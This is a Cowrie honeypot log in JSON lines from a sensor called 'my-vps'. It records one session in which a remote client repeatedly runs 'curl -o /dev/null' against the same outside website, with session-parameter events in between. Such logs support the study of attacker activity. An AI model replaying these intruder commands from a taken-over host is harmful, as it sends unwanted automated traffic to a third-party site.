{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.715120Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.751919Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.753002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.790387Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.791442Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.829700Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.830816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.870896Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.871948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.911292Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.912505Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.950142Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.951209Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.999792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.000934Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.096003Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.097045Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.134060Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.135124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.172412Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.173409Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.210569Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.211673Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.248087Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.249430Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.325281Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.326543Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.363401Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.364408Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.414079Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.415293Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.452748Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.453817Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.491244Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.492273Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.560483Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.561630Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.598687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.599817Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.636405Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.637412Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.675413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.676499Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.812734Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.813756Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.851211Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.852237Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.889464Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.890490Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.937579Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.938580Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:52.976308Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:52.977533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.144112Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.145126Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.197023Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.198030Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.234692Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.235706Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.272167Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.273154Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.310202Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.311283Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.381297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.382688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.419459Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.420488Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.457620Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.458823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.497600Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.498947Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.538732Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.540055Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.581596Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.582914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.620012Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.621365Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.660096Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.661727Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.717481Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.718640Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.756552Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.757581Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.798898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.800228Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.838173Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.839337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.884313Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.885421Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.925840Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.926921Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:53.964717Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:53.966127Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.003623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.004868Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.067918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.069077Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.107593Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.108813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.147667Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.149083Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.186354Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.187724Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.225961Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.227216Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.265113Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.266426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.308237Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.309174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.387301Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.388664Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.425632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.426721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.464992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.465997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.502331Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.503324Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.539622Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.540614Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.577136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.578321Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.663451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.664457Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.702001Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.703109Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.740801Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.741884Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:54.779145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:54.780219Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
